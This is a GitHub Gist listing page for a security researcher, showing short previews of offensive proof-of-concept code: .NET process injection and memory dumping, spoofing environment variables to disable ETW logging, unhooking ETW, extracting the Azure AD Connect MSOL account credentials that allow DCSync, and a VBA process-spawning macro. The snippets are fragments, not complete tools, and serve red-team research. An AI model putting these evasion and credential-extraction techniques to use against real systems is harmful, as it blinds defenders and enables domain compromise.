Skip to content

Instantly share code, notes, and snippets.

Avatar

xpn xpn

View GitHub Profile
View dotnet_inject.cpp
// Compile with g++ dotnet_injectbundle.cpp -o dotnet_injectbundle
#include <stdio.h>
#include <fcntl.h>
#include <string.h>
#include <unistd.h>
#include <stdlib.h>
#include "main.h"
// libcorclr.dll signature for finding hlpDynamicFuncTable
View dotnet_injectbundle.cpp
// Compile with g++ dotnet_injectbundle.cpp -o dotnet_injectbundle
#include <stdio.h>
#include <fcntl.h>
#include <string.h>
#include <unistd.h>
#include <stdlib.h>
#include <mach-o/dyld.h>
#include "main.h"
@xpn
xpn / main.h
Created Aug 31, 2020
dotnet_memwrite.c
View main.h
typedef unsigned int DWORD;
typedef unsigned char BYTE;
typedef unsigned char * PBYTE;
typedef DWORD HRESULT;
typedef unsigned short USHORT;
typedef unsigned int ULONG;
typedef unsigned char UCHAR;
typedef bool BOOL;
static const DWORD kCurrentMajorVersion = 2;
@xpn
xpn / memdump.c
Created Aug 31, 2020
dotnet_memdump.c
View memdump.c
#include <stdio.h>
#include <fcntl.h>
#include <string.h>
#include <unistd.h>
#include <stdlib.h>
#include "memdump.h"
#define DUMP_COUNT 50
// Headers which we will need to use throughout our session
@xpn
xpn / env_var_spoofing_poc.cpp
Created Jun 6, 2020
A very rough x64 POC for spoofing environment variables (similar to argument spoofing) with a focus on setting the COMPlus_ETWEnabled=0 var used to disable ETW in .NET
View env_var_spoofing_poc.cpp
// A very rough x64 POC for spoofing environment variables similar to argument spoofing with a focus on
// setting the COMPlus_ETWEnabled=0 var for disabling ETW in .NET.
//
// Works by launching the target process suspended, reading PEB, updates the ptr used to store environment variables,
// and then resuming the process.
//
// (https://blog.xpnsec.com/hiding-your-dotnet-complus-etwenabled/)
#define INJECT_PARAM L"COMPlus_ETWEnabled=0\0\0\0"
#define INJECT_PARAM_LEN 43
@xpn
xpn / azuread_decrypt_msol_v2.ps1
Created Apr 11, 2020
Updated method of dumping the MSOL service account (which allows a DCSync) used by Azure AD Connect Sync
View azuread_decrypt_msol_v2.ps1
Write-Host "AD Connect Sync Credential Extract v2 (@_xpn_)"
Write-Host "`t[ Updated to support new cryptokey storage method ]`n"
$client = new-object System.Data.SqlClient.SqlConnection -ArgumentList "Data Source=(localdb)\.\ADSync;Initial Catalog=ADSync"
try {
$client.Open()
} catch {
Write-Host "[!] Could not connect to localdb..."
return
View unmanaged_dotnet_unhook_etw.c
#include <stdio.h>
#include <Windows.h>
#include <MSCorEE.h>
#include <MetaHost.h>
#include <evntprov.h>
int main()
{
ICLRMetaHost* metaHost = NULL;
IEnumUnknown* runtime = NULL;
View dotnet_unhook_etw.cs
using System;
using System.Reflection;
using System.Runtime.InteropServices;
namespace test
{
class Win32
{
[DllImport("kernel32")]
public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
@xpn
xpn / dotnet_etw.c
Created Mar 16, 2020
A demo of how to collect information on basic .NET events from ETW.
View dotnet_etw.c
#define AssemblyDCStart_V1 155
#define MethodLoadVerbose_V1 143
#include <windows.h>
#include <stdio.h>
#include <wbemidl.h>
#include <wmistr.h>
#include <evntrace.h>
#include <Evntcons.h>
@xpn
xpn / PCMPBNMBAO_x86_poc.vba
Created Oct 26, 2019
PROCESS_CREATION_MITIGATION_POLICY_BLOCK_NON_MICROSOFT_BINARIES_ALWAYS_ON POC via VBA
View PCMPBNMBAO_x86_poc.vba
' POC to spawn process with PROCESS_CREATION_MITIGATION_POLICY_BLOCK_NON_MICROSOFT_BINARIES_ALWAYS_ON mitigation enabled
' by @_xpn_
'
' Thanks to https://github.com/itm4n/VBA-RunPE and https://github.com/christophetd/spoofing-office-macro
Const EXTENDED_STARTUPINFO_PRESENT = &H80000
Const HEAP_ZERO_MEMORY = &H8&
Const SW_HIDE = &H0&
Const MAX_PATH = 260
Const PROC_THREAD_ATTRIBUTE_MITIGATION_POLICY = &H20007